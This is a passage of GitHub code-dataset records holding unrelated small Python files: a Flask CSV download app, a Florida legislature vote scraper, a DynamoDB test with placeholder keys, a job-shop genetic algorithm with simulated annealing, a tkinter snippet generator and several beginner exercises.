Client/Solution/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6052151282","text":"print('-=' * 10)\r\nprint('LIST OF VALUES')\r\nprint('-=' * 10)\r\nlista = []\r\nwhile True:\r\n    n = int(input('Enter a value: '))\r\n    if n in lista:\r\n        print('this value is already in the list.')\r\n    else:\r\n        lista.append(n)\r\n    continuar = str(input('Do you want to continue? [Y/N] ')).strip().upper()[0]\r\n    if continuar == 'N':\r\n        break\r\nlista.sort()\r\nprint('-=' * 10)\r\nprint(f'The list you entered contains the following values {lista}')\r\n","repo_name":"thiagovilar07/Python-exercises","sub_path":"ex079.py","file_name":"ex079.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19238649542","text":"import os\nfrom flask import Flask, render_template, request, redirect, session, send_file\nfrom datetime import datetime\nfrom MainFunc import create_dataset\n\napp = Flask(__name__)\napp.secret_key = os.urandom(16) #secret key for sessions\n\n\n\n#home page route\n@app.route('/', methods = ['GET', 'POST'])\ndef index():\n    if request.method == 'POST':\n        searchterm = request.form[\"searchterm\"]\n        create_dataset(searchterm)\n        \n        return render_template('home.html', search_term=searchterm)\n\n    return render_template('home.html')\n\n\n@app.route('/download/')\ndef download():\n    file_names = []\n    dir_path = 'outputs'\n    for filename in sorted(os.listdir(dir_path)):\n        if filename.endswith('csv'):\n            file_names.append([filename,datetime.strptime(filename.replace('.csv', '').split('__')[1],\"%d-%m-%Y-%H-%M\")])\n\n    file_names = sorted(file_names, key=lambda x: x[1], reverse=True)\n\n\n    return render_template('download.html', file_names=file_names)\n\n@app.route('/download/<filename>')\ndef downloadFile(filename):\n#load all of the available csv files, sorting by newer. 
and add a download button\n path = 'outputs/'+filename\n return send_file(path, as_attachment=True)\n\n\n \n","repo_name":"OmarAlsouly/SILC_App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71295637546","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport pymysql\nimport time\n\ndef scrollToElement(eleId):\n\tglobal driver\n\tdriver.execute_script('var element = document.getElementById(\"'+eleId+'\");element.scrollIntoView({block: \"end\"});')\n\telement = WebDriverWait(driver, 10).until(\n \tEC.visibility_of_element_located((By.ID, eleId))\n\t)\n\ndef getBillLinks():\n\tglobal driver\n\tribbonbills = driver.find_elements_by_class_name(\"ribbonbill\")\n\tfor bill in ribbonbills:\n\t\tanchor = bill.find_element_by_tag_name('a')\n\t\tbillLinks.append(anchor.get_attribute('href'))\n\t\tprint(\"URL Acquired: %s\" % (anchor.get_attribute('href')))\n\ndef getVoteCount(url):\n\thtml = urlopen(url)\n\tbsObj = BeautifulSoup(html, \"html.parser\")\n\n\ttable = bsObj.find(\"table\",{\"id\":\"ctl00_ContentPlaceHolder1_dlVoteMember\"})\n\n\tnamesHTML = table.findAll(\"span\",{\"class\":\"text\"})\n\tvotesHTML = table.findAll(\"span\",{\"class\":\"textBold\"})\n\n\tnames = []\n\tvotes = []\n\n\tfor name in namesHTML:\n\t\tnames.append(name.getText())\n\n\tfor vote in votesHTML:\n\t\tvotes.append(vote.getText())\n\n\tnameVotes = dict(zip(names, votes))\n\n\tchanges = bsObj.find(\"div\",{\"id\":\"ctl00_ContentPlaceHolder1_RollCallHistDIV\"}).table\n\tchangeRows = changes.findAll(\"tr\")\n\tchange = \"\"\n\tfor row in changeRows:\n\t\tif row.attrs['colspan'] == \"1\":\n\t\t\tif row.td.span.getText() == \"Yeas\" or row.td.span.getText() == \"Nays To Yeas\":\n\t\t\t\tchange = \"Y\"\n\t\t\telif row.td.span.getText() == \"Nays\" or row.td.span.getText() == \"Yeas To Nays\":\n\t\t\t\tchange = \"N\"\n\t\telif row.attrs['colspan'] == \"3\":\n\t\t\tnameVotes[row.td.getText().strip()] = change\n\n\ttime.sleep(2) # Being courteous\n\treturn nameVotes\n\ndef returnEmptyVote(cameralType):\n\ttry:\n\t\tconn = pymysql.connect(host='127.0.0.1', unix_socket='/Applications/XAMPP/xamppfiles/var/mysql/mysql.sock', user='root', passwd=None, db='flbilltrack', charset='utf8')\n\t\tcur = conn.cursor()\n\t\tcur.execute(\"USE flbilltrack\")\n\t\tcur.execute(\"SELECT lname FROM %s\" % (cameralType))\n\t\tcur.connection.commit()\n\t\tcongressmen = cur.fetchall()\n\t\toutput = {}\n\t\tfor congressman in congressmen:\n\t\t\toutput[congressman[0]] = \"none\"\n\tfinally:\n\t\tcur.close()\n\t\tconn.close()\n\n\treturn output\n\ndef getBillInfo(url):\n\thtml = urlopen(url)\n\tbsObj = BeautifulSoup(html, \"html.parser\")\n\n\t# Get the bill number/name\n\theading = bsObj.find(\"h1\", {\"class\":\"ribbonbilldetail\"}).getText()\n\tnumber = heading[:heading.index(\"-\")-2].strip()\n\tname = heading[heading.index(\"-\")+1:].strip()\n\n\t# Get the bill summary\n\tsummary = bsObj.find(\"span\", {\"id\":\"lblShortTitle\"}).getText()\n\n\t# Get the full text URL\n\tfullTextURL = \"http://www.myfloridahouse.gov/\" + bsObj.find(\"a\", text=re.compile(\"Enrolled\")).attrs['href']\n\n\t# Get the voting 
record\n\ttry:\n\t\t# Get the \"Vote History\" table\n\t\tresultsTbl = bsObj.find(\"table\", {\"id\":\"ctl00_ContentPlaceHolder1_ctrlContentBox_ctrlPageContent_ctl00_dgHistory\"})\n\t\tresultsTblLength = len(resultsTbl.tbody.findAll(\"tr\"))\n\n\t\t# Get the heading of the last row\n\t\tlastRowHeading = resultsTbl.tbody.findAll(\"tr\")[resultsTblLength-1].findAll(\"td\")[0].getText().strip()\n\n\t\t# If the last vote was a House vote, get it and work up until a heading not called \"House\" is found, that's the Senate vote row, vice versa.\n\t\tif lastRowHeading == \"House\":\n\t\t\thouseResults = \"http://www.myfloridahouse.gov/\" + resultsTbl.tbody.findAll(\"tr\")[resultsTblLength-1].findAll(\"td\")[6].a.attrs[\"href\"]\n\t\t\ti = resultsTblLength-1\n\t\t\tiRowHeading = resultsTbl.tbody.findAll(\"tr\")[i].findAll(\"td\")[0].getText().strip()\n\t\t\twhile iRowHeading != \"Senate\" and i > 0:\n\t\t\t\ti -= 1\n\t\t\t\tiRowHeading = resultsTbl.tbody.findAll(\"tr\")[i].findAll(\"td\")[0].getText().strip()\n\t\t\tsenateResults = \"http://www.myfloridahouse.gov/\" + resultsTbl.tbody.findAll(\"tr\")[i].findAll(\"td\")[6].a.attrs[\"href\"]\n\n\t\telif lastRowHeading == \"Senate\":\n\t\t\tsenateResults = \"http://www.myfloridahouse.gov/\" + resultsTbl.tbody.findAll(\"tr\")[resultsTblLength-1].findAll(\"td\")[6].a.attrs[\"href\"]\n\t\t\ti = resultsTblLength-1\n\t\t\tiRowHeading = resultsTbl.tbody.findAll(\"tr\")[i].findAll(\"td\")[0].getText().strip()\n\t\t\twhile iRowHeading != \"House\" and i > 0:\n\t\t\t\ti -= 1\n\t\t\t\tiRowHeading = resultsTbl.tbody.findAll(\"tr\")[i].findAll(\"td\")[0].getText().strip()\n\t\t\t\thouseResults = \"http://www.myfloridahouse.gov/\" + resultsTbl.tbody.findAll(\"tr\")[i].findAll(\"td\")[6].a.attrs[\"href\"]\n\n\t\t# Get House Votes\n\t\thouseVotes = getVoteCount(houseResults)\n\n\t\t# Get Senate Votes\n\t\tsenateVotes = getVoteCount(senateResults)\n\n\t# If no \"Vote History\" table was found, return an empty set of votes\n\texcept:\n\t\thouseVotes = returnEmptyVote(\"representatives\")\n\t\tsenateVotes = returnEmptyVote(\"senators\")\n\n\ttime.sleep(2) # Being courteous\n\t\n\treturn {\n\t\t\"url\": url,\n\t\t\"number\": number,\n\t\t\"name\": name,\n\t\t\"summary\": summary,\n\t\t\"fullTextURL\": fullTextURL,\n\t\t\"senateVotes\": senateVotes,\n\t\t\"houseVotes\": houseVotes\n\t}\n\ndef saveToDB(bill):\n\ttry: \n\t\tconn = pymysql.connect(host='127.0.0.1', unix_socket='/Applications/XAMPP/xamppfiles/var/mysql/mysql.sock', user='root', passwd=None, db='flbilltrack', charset='utf8')\n\t\tcur = conn.cursor()\n\t\tcur.execute(\"USE flbilltrack\")\n\n\t\tprint(\"Number: %r\\n Name: %r\\n Summary: %r\\n fullTextURL: %r\\n URL: %r\" % (bill['number'], bill['name'], bill['summary'], bill['fullTextURL'], bill['url']))\n\t\tcur.execute(\"INSERT INTO bills(number,name,summary,fullTextURL,url) VALUES(%s,%s,%s,%s,%s)\", (bill['number'], bill['name'], bill['summary'], bill['fullTextURL'], bill['url']))\n\t\tcur.connection.commit()\n\n\t\tcur.execute(\"SELECT id FROM bills ORDER BY ID DESC LIMIT 1\")\n\t\tcur.connection.commit()\n\t\tbillId = str(cur.fetchone()[0])\n\n\t\tfor key, value in sorted(bill[\"houseVotes\"].items()):\n\t\t\tcur.execute(\"INSERT INTO votes(cameral,congressman,billid,vote) VALUES(%s,%s,%s,%s)\", (\"House\", key, billId,value))\n\t\t\tcur.connection.commit()\n\t\t\tprint(\"Cameral: %s, Congressman: %s, Bill Id: %s, Vote: %s\" % (\"House\", key, billId, value))\n\n\t\tfor key, value in sorted(bill[\"senateVotes\"].items()):\n\t\t\tprint(\"Cameral: %s, 
Congressman: %s, Bill Id: %s, Vote: %s\" % (\"Senate\", key, billId, value))\n\t\t\tcur.execute(\"INSERT INTO votes(cameral,congressman,billid,vote) VALUES(%s,%s,%s,%s)\", (\"Senate\", key, billId,value))\n\t\t\tcur.connection.commit()\n\n\t\tcur.close()\n\tfinally:\n\t\tconn.close()\n\n\n# Program Start\nbillLinks = []\n\n# Get to Enrolled Bills\ndriver = webdriver.Firefox()\ndriver.get(\"http://www.myfloridahouse.gov/Sections/Bills/bills.aspx\")\nassert \"Florida\" in driver.title\nselect = Select(driver.find_element_by_name('ddlBillList'))\nselect.select_by_value(\"1\")\nscrollToElement(\"btnShowBills\")\ndriver.find_element_by_id(\"btnShowBills\").click()\n\n# Get all the pages\npageVals = [];\npageNav = driver.find_element_by_name(\"ddlPaging\")\npageLinks = pageNav.find_elements_by_css_selector(\"*\")\nfor pageLink in pageLinks:\n\tpageVals.append(pageLink.get_attribute('value'))\n\n# For each page, get all the bill links\nfor pageVal in pageVals:\n\tselect = Select(driver.find_element_by_name('ddlPaging'))\n\tselect.select_by_value(pageVal)\n\telement = WebDriverWait(driver, 10).until(\n \tEC.presence_of_element_located((By.ID, \"pnlLeavingMyFloridaHouse\"))\n\t)\n\tgetBillLinks()\ndriver.close()\n\n# For each bill, get all the info and save it to a database\nfor billLink in billLinks:\n\tsaveToDB(getBillInfo(billLink))\n","repo_name":"brizandrew/fl-legislature-tracker","sub_path":"FLBillTracker.py","file_name":"FLBillTracker.py","file_ext":"py","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25201411080","text":"class CustomStack:\n\n def __init__(self, maxSize: int):\n self.m = maxSize\n self.stack = []\n self.l = 0\n\n def push(self, x: int) -> None:\n if self.l < self.m:\n self.stack.append(x)\n self.l += 1\n\n def pop(self) -> int:\n if self.stack == []:\n return -1\n self.l -= 1\n return self.stack.pop()\n \n\n def increment(self, k: int, val: int) -> None:\n t = 0\n if k < self.l:\n t = k\n else:\n t = self.l\n for i in range(t):\n self.stack[i] += val\n\n\n# Your CustomStack object will be instantiated and called as such:\n# obj = CustomStack(maxSize)\n# obj.push(x)\n# param_2 = obj.pop()\n# obj.increment(k,val)","repo_name":"Atul-Verma-Git/100-days-of-code","sub_path":"design-a-stack-with-increment-operation/design-a-stack-with-increment-operation.py","file_name":"design-a-stack-with-increment-operation.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24494707727","text":"\r\ndef binary(n):\r\n # Create an empty list to store the binary representation\r\n binary_list = []\r\n\r\n # Loop through the number until it is 0\r\n while n > 0:\r\n # Calculate the remainder and append it to the list\r\n remainder = n % 2\r\n binary_list.append(remainder)\r\n\r\n # Update the number\r\n n = n // 2\r\n # Reverse the list\r\n binary_list.reverse()\r\n\r\n # Return the list\r\n return binary_list\r\n\r\nprint(binary(6))","repo_name":"MatthewSalo/NTU-Week-2","sub_path":"Binary_funct.py","file_name":"Binary_funct.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32358376815","text":"import boto3\n\nclient = boto3.client('dynamodb', aws_access_key_id='xxx', aws_secret_access_key='xxx', region_name='us-east-2')\n\n\nresponse = client.put_item(\n TableName='cablegate_document',\n Item={\n 
'name':{'S': 'test'} # note the specific syntax here\n    }\n)\n\n\n# useful links\n# https://sysadmins.co.za/experimenting-the-client-interface-for-dynamodb-in-boto3-with-gamescores/\n# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html#DynamoDB.Client.put_item\n","repo_name":"paul-mathieu/cablegate-cia-analysis","sub_path":"2-convert-data/upload/test upload.py","file_name":"test upload.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16007647503","text":"import random\nimport numpy as np\nimport math\n\nmachNo = 3 # int(input(\"How many machines do you have? \"))\njob = 3 # int(input(\"How many jobs do you have? \"))\ntasks = 3 #int(input(\"How many tasks in each job?\"))\n\ncrRate = 0.8\nmutRate = 0.2\n\nmachines = []\ntimes = []\n\nfor i in range(job):\n    curr = []\n    currT = []\n    for j in range(tasks):\n        curr.append(int(input())-1)\n        currT.append(int(input()))\n    machines.append(curr)\n    times.append(currT)\n\nrandArr = tasks * [i for i in range(job)]\n\ndef encode(popSize):\n    finPop = []\n\n    for _ in range(popSize):\n        finPop.append(random.sample(randArr, job*tasks))\n\n    return finPop\n\n\ndef fitness(chromosome):\n    machT = [0 for _ in range(machNo)]\n    jobs = [0 for _ in range(tasks)]\n\n    started = []\n\n    for _ in range(job):\n        arr = []\n        for _ in range(tasks):\n            arr.append(0)\n        started.append(arr)\n\n    for i in chromosome:\n        machine = machines[i][jobs[i]]\n        time = times[i][jobs[i]]\n        prevTime = times[i][jobs[i]-1]\n        if jobs[i] != 0:\n            if (machT[machine] > started[i][jobs[i]-1]+prevTime):\n                started[i][jobs[i]] = machT[machine]\n                machT[machine] += time\n            else:\n                started[i][jobs[i]] = started[i][jobs[i]-1]+prevTime\n                machT[machine] = started[i][jobs[i]] + time\n        else:\n            started[i][jobs[i]] = machT[machine]\n            machT[machine] += time\n\n        jobs[i] += 1\n\n    makespan = max(machT)\n\n    return makespan\n\n\ndef rouletteWheel (pop, fitnesses):\n    invSm = sum([1/k for k in fitnesses])\n    probs = [(1/k)/invSm for k in fitnesses]\n    \n    chc = np.random.choice(range(len(pop)), p=probs)\n    return pop[chc]\n\n\ndef crossover (par1, par2):\n    child1 = list(par1)\n    child2 = list(par2)\n\n    randm = random.randint(0, len(child1))\n\n    if (random.random() <= crRate):\n        child1[randm::], child2[randm::] = child2[randm::], child1[randm::]\n\n    return child1, child2\n\n\ndef fixCrossover (child):\n    counts = [0 for _ in range(machNo)]\n\n    for i in child:\n        counts[i] += 1\n\n    more = []\n    less = []\n\n    for i in range(machNo):\n        if counts[i] > machNo:\n            more.append([i, counts[i] - machNo])\n        elif counts[i] < machNo:\n            less.append([i, machNo - counts[i]])\n\n    for i in more:\n        while i[1] > 0:\n            currInd = child.index(i[0])\n            currLess = less[0]\n            child[currInd] = currLess[0]\n            less[0][1] -= 1\n            if (less[0][1] == 0):\n                less.pop(0)\n            i[1] -= 1\n\n    return child\n\n\ndef mutation (child):\n\n    if (random.random() <= mutRate):\n        ind1 = random.randint(0, len(child)-1)\n        ind2 = random.randint(0, len(child)-1)\n\n        child[ind1], child[ind2] = child[ind2], child[ind1]\n    \n    return child\n\n# SA\n\ndef metropolis (oldF, newF, tmp):\n    return math.exp(-abs(newF - oldF) / tmp)\n\n\ndef perturb (old):\n    f = random.randint(0, len(old)-1)\n    s = random.randint(f, len(old)-1)\n\n    annealed = list(old)\n    annealed[f:s] = reversed(annealed[f:s])\n\n    return annealed\n\n\ndef accept (newF, oldF, tmp):\n    if (newF < oldF):\n        return True\n    else:\n        if (random.random() < metropolis(oldF, newF, tmp)):\n            return True\n        else: return 
False\n\n\ndef simulated (currSol):\n    temp = 100\n    stopTemp = 0.00001\n\n    rate = 0.9995\n    iters = 50\n\n    sols = []\n\n    for _ in range (iters):\n        if (temp > stopTemp):\n\n            sols.append(currSol)\n            \n            neighbour = perturb(currSol)\n            # accept() expects (newF, oldF, tmp): pass the neighbour's fitness first\n            if accept(fitness(neighbour), fitness(currSol), temp):\n                currSol = neighbour\n\n            temp *= rate\n\n    return currSol\n\n# Driver Code\n\npopSize = 30\n\n# Generate Population\ngenome = encode(popSize)\n\n# Recording the best makespan\nbests = []\n\nfor _ in range(30):\n\n    # Calculate Fitness\n    fitnesses = []\n\n    for i in genome:\n        fitnesses.append(fitness(i))\n\n    #for i in genome:\n    #    print (i)\n\n    #print(\"change\")\n\n    bests.append(min(fitnesses))\n\n    # Selection\n    selected = [rouletteWheel(genome, fitnesses) for _ in range(popSize)]\n\n    # Crossover and Mutation\n\n    childPop = []\n\n    for i in range(0, popSize, 2):\n        par1 = selected[i]\n        par2 = selected[i+1]\n\n        children = crossover(par1, par2)\n        child1 = mutation(fixCrossover(children[0]))\n        child2 = mutation(fixCrossover(children[1]))\n\n        childPop.append(child1)\n        childPop.append(child2)\n\n    arr = [(fitness(childPop[i]), i) for i in range(popSize)]\n    arr = sorted(arr, reverse=True)\n\n    genome = []\n\n    for j in range(popSize):\n        if j <= popSize//2:\n            genome.append(simulated(childPop[arr[j][1]]))\n        else:\n            genome.append(childPop[arr[j][1]])\n\n\nfor i in range(len(bests)):\n    print (\"Best Makespan for Generation\", i, \"is:\", bests[i])\n\n","repo_name":"pi34/Metaheuristics-JSS","sub_path":"GASA.py","file_name":"GASA.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41504185672","text":"from PyQt5 import QtWidgets, Qt, QtCore, QtGui\n\nclass DockLayout(QtWidgets.QVBoxLayout):\n\n\tdef __init__(self, window, parent):\n\t\tsuper().__init__(parent)\n\t\tself.window = window\n\t\tself.setSpacing(10)\n\t\tself.setAlignment(QtCore.Qt.AlignCenter)\n\n\t\tself.home_button= QtWidgets.QPushButton()\n\t\tself.home_image = QtGui.QPixmap('../home.svg').scaled(40, 40)\n\t\tself.home_button.setIcon(QtGui.QIcon(self.home_image))\n\t\tself.home_button.setFixedSize(40, 40)\n\t\tself.home_button.setStyleSheet('QPushButton { background-color: #f98d58; color: white; border: 2px solid #ffffff; border-radius: 5px; padding: 5px 10px; }')\n\t\tself.home_button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n\t\tself.home_button.clicked.connect(lambda: self.window.swap_screen(\"home\"))\n\n\t\tself.lesson_button= QtWidgets.QPushButton()\n\t\tself.lesson_image = QtGui.QPixmap('../lesson.svg').scaled(40, 40)\n\t\tself.lesson_button.setIcon(QtGui.QIcon(self.lesson_image))\n\t\tself.lesson_button.setFixedSize(40, 40)\n\t\tself.lesson_button.setStyleSheet('QPushButton { background-color: #f98d58; color: white; border: 2px solid #ffffff; border-radius: 5px; padding: 5px 10px; }')\n\t\tself.lesson_button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n\t\tself.lesson_button.clicked.connect(lambda: self.window.swap_screen(\"lesson\"))\n\n\t\tself.notes_button= QtWidgets.QPushButton()\n\t\tself.notes_image = QtGui.QPixmap('../notes.svg').scaled(40, 40)\n\t\tself.notes_button.setIcon(QtGui.QIcon(self.notes_image))\n\t\tself.notes_button.setFixedSize(40, 40)\n\t\tself.notes_button.setStyleSheet('QPushButton { background-color: #f98d58; color: white; border: 2px solid #ffffff; border-radius: 5px; padding: 5px 10px; 
}')\n\t\tself.notes_button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n\t\tself.notes_button.clicked.connect(lambda: self.window.swap_screen(\"notes\"))\n\n\t\tself.close_button= QtWidgets.QPushButton()\n\t\tself.close_image = QtGui.QPixmap('../close.svg').scaled(40, 40)\n\t\tself.close_button.setIcon(QtGui.QIcon(self.close_image))\n\t\tself.close_button.setFixedSize(40, 40)\n\t\tself.close_button.setStyleSheet('QPushButton { background-color: #f98d58; color: white; border: 2px solid #ffffff; border-radius: 5px; padding: 5px 10px; }')\n\t\tself.close_button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n\t\tself.close_button.clicked.connect(self.window.close)\n\n\t\tself.addWidget(self.home_button, alignment=QtCore.Qt.AlignCenter)\n\t\tself.addWidget(self.lesson_button, alignment=QtCore.Qt.AlignCenter)\n\t\tself.addWidget(self.notes_button, alignment=QtCore.Qt.AlignCenter)\n\t\tself.addWidget(self.close_button, alignment=QtCore.Qt.AlignCenter)\n","repo_name":"DontChewOnChewie/Final-Year-Project---Automatic-Virtualised-Learning-Tool","sub_path":"App/VM_Shared/App/screens/dock/dockLayout.py","file_name":"dockLayout.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3688034022","text":"x=input('Enter a whole number less than 100 to get its factorial\\n')\r\nx=int(x)\r\nn=x\r\n\r\nif x<100 and x>1 :\r\n    while(n>1):\r\n        x= x * (n - 1)\r\n        n=n-1\r\n\r\nelif x==1:\r\n    x=1\r\nelif x==0:\r\n    x=1 # 0! is 1 by definition\r\nelse:\r\n    print('number must be a whole number and must be less than 100')\r\n\r\n\r\nprint(x)","repo_name":"Psami-wondah/Documents","sub_path":"Factoria of numbers less than 100.py","file_name":"Factoria of numbers less than 100.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25615068519","text":"import discord\nfrom discord.ext import commands\nfrom discord.utils import get\n\nclass c120(commands.Cog, name=\"c120\"):\n\n    def __init__(self, bot: commands.Bot):\n        self.bot = bot\n    @commands.command(name='Spring\\'s_Herald', aliases=['c120'])\n    async def example_embed(self, ctx):\n        embed = discord.Embed(title='Spring\\'s Herald',\n                              color=0x00008B)\n        embed.set_thumbnail(url='https://www.duelingbook.com/images/custom-pics/2300000/2328211.jpg')\n\n        embed.add_field(name='Status (Archetype)', value='Casual:3/Tournament:3', inline=True)\n        embed.add_field(name='Type (Attribute)', value='Fairy/Link/Effect (EARTH)', inline=False)\n        embed.add_field(name='Link Rating (ATK/Link Arrows)', value='2 (500/⬆️⬇️)', inline=False)\n        embed.add_field(name='Monster Effect', value='2 Effect Monsters\\nYou can banish 1 monster that this card points to until your next Standby Phase. You can target 3 of your banished monsters or 3 of your opponent\\'s banished monsters; shuffle them into the Deck, and if you do, draw 1 card. 
You can only use each effect of \"Spring\\'s Herald\" once per turn.', inline=False)\n        embed.set_footer(text='Set Code: ANCF')\n\n        await ctx.send(embed=embed)\n\ndef setup(bot: commands.Bot):\n    bot.add_cog(c120(bot))","repo_name":"ProfessorSean/Kasutamaiza","sub_path":"upcfcardsearch/c120.py","file_name":"c120.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71135747946","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import font\nfrom tkinter import filedialog, messagebox, Toplevel, Frame, Scrollbar\n\n# import tkinter.scrolledtext\nfrom tkinter import scrolledtext as st\nfrom tkinter import *\nimport tkinter.colorchooser\nimport os, pathlib\nimport pyautogui as pg\nimport pyperclip as pc\nimport glob\nimport time\n\n\n\n\n\nclass Coder(object):\n    ecount = 1\n    btncount = 1\n    btncount2 = 1\n    labelcount = 1\n    canvascount = 1\n    lboxcount = 1\n    rowcount = 1\n    columncount = 1\n    combocount = 1\n    spincount = 1\n    textcount = 1\n    slidercount = 1\n    scrollcount = 1\n    projectcount = 1\n    def __init__(self,parent):\n        self.parent = parent\n        self.top = Toplevel()\n        self.frm1 = ttk.Frame(self.parent, width=800, height=150)\n        self.frm1.grid(row=1, column=1)\n        self.txt = st.ScrolledText(self.top, height=50, width=100, bg='white',bd=15)\n        self.txt.grid(row=10, column=0,sticky=\"nsew\")\n        self.btn1 = tk.Button(self.frm1, text=\"imports\", bg=\"orange\", bd=5,command=self.qukimp)\n        self.btn1.grid(row=5, column=1)\n        self.btn2 = tk.Button(self.frm1, text=\"Entry\", bg=\"orange\",bd =5, command=self.e_code)\n        self.btn2.grid(row=6, column=1)\n        self.btn3 = tk.Button(self.frm1, text=\"Button Code1\", bg=\"orange\", command=self.button_code)\n        self.btn3.grid(row=7, column=1)\n        self.btn4 = tk.Button(self.frm1, text=\"Button code2\", bg=\"orange\", command=self.button_code2)\n        self.btn4.grid(row=8, column=1)\n##        self.btn5 = tk.Button(self.frm1, text=\"ctlr alt t\", bg=\"violet\", command=pg4)\n##        self.btn5.grid(row=9, column=1)\n##        self.btn6 = tk.Button(self.frm1, text=\"terminal\", bg=\"orange\", command=pg5)\n##        self.btn6.grid(row=10, column=1)\n##        self.btn7 = tk.Button(self.frm1, text=\"open app\", bg=\"orange\", command=pg6)\n##        self.btn7.grid(row=11, column=1)\n##        self.btn8 = tk.Button(self.frm1, text=\"alt F4 close\", bg=\"orange\", command=pg7)\n##        self.btn8.grid(row=12, column=1)\n##        self.btn9 = tk.Button(self.frm1, text=\"pg.moveTo\", bg=\"light blue\", command=pg8)\n##        self.btn9.grid(row=13, column=1)\n##        self.btn10 = tk.Button(self.frm1, text=\"apt udate\", bg=\"orange\", command=pg9)\n##        self.btn10.grid(row=14, column=1)\n##        self.btn11 = tk.Button(self.frm1, text=\"self.btn1\", bg=\"orange\", command=pg10)\n##        self.btn11.grid(row=15, column=1)\n##        self.btn12 = tk.Button(self.frm1, text=\"self.btn1\", bg=\"orange\", command=pg11)\n##        self.btn12.grid(row=16, column=1)\n##        self.btn13 = tk.Button(self.frm1, text=\"self.btn1\", bg=\"orange\", command=pg12)\n##        self.btn13.grid(row=17, column=1)\n##\n##\n\n\n\n\n\n    def qukimp(self):\n        qpo = (\n            \"\"\"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import font\nfrom tkinter import filedialog, messagebox, Toplevel, Frame\nfrom tkinter import *\nimport os, pathlib\nimport pyautogui as pg\nimport pyperclip as pc\nimport glob\nimport time\"\"\"\n            + \"\\n\"\n        )\n        self.txt.insert(tk.END, qpo)\n\n\n    def e_code(self):\n        \n        w_str = (\n            \"\"\" self.var = tk.StringVar(self)\n        self.e1 = tk.Entry(self, textvariable=self.var, 
bg='snow')\n        self.e1.grid(row=3, column=4)\"\"\"\n            + \"\\n\"\n        )\n        w_str2 = w_str.replace(\"self.var\", \"self.var\" + str(self.ecount))\n        w_str3 = w_str2.replace(\"self.e1\", \"self.e\" + str(self.ecount))\n        w_str4 = w_str3.replace(\"row=3\", \"row=\" + str(self.rowcount))\n        self.txt.insert(tk.END, w_str4)\n        self.ecount += 1\n        self.rowcount += 1\n\n    def button_code(self):\n        \n        w_str = (\n            \"\"\" self.b1 = tk.Button(root,relief=tk.FLAT, compound=tk.LEFT,text=\"new\",command=None)\n        self.b1.grid(row=1, column=2)\"\"\"\n            + \"\\n\"\n        )\n        w_str2 = w_str.replace(\"b1\", \"b\" + str(self.btncount))\n        w_str3 = w_str2.replace(\"row=1\", \"row=\" + str(self.rowcount))\n        self.txt.insert(tk.END, w_str3)\n        self.btncount += 1\n        self.rowcount += 1\n\n    def button_code2(self):\n        \n        w_str = (\n            \"\"\" self.btn1 = tk.Button(self,\n                         relief=tk.FLAT,\n                         compound=tk.LEFT,\n                         text=\"new\",\n                         command=None,\n\n        )\nself.btn1.grid(row=2, column=1)\"\"\"\n            + \"\\n\"\n        )\n        w_str2 = w_str.replace(\"self.btn1\", \"self.btn\" + str(self.btncount2))\n        w_str3 = w_str2.replace(\"column=1\", \"column=\" + str(self.columncount))\n        self.txt.insert(tk.END, w_str3)\n        self.btncount2 += 1\n        self.columncount += 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass App(tk.Tk):\n    def __init__(self):\n        tk.Tk.__init__(self)\n        c = Coder(self)\n\nif __name__ == \"__main__\":\n    app=App()\n    app.mainloop()\n","repo_name":"growcacti/button-coder-project","sub_path":"btn_coder_OOP op.py","file_name":"btn_coder_OOP op.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43457459294","text":"secret_number = 8\nattempts = 0\nguess_limit = 3\n\nwhile attempts < guess_limit:\n    guess = int(input('Guess a number: '))\n    attempts += 1\n    if guess == secret_number:\n        print(\"Well done !\")\n        break\nelse:\n    print(\"Sorry you failed !\")\n","repo_name":"mehdi-ahmed/python-introduction","sub_path":"assignments/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6523565548","text":"import database\nimport matplotlib.pyplot as plt\nimport 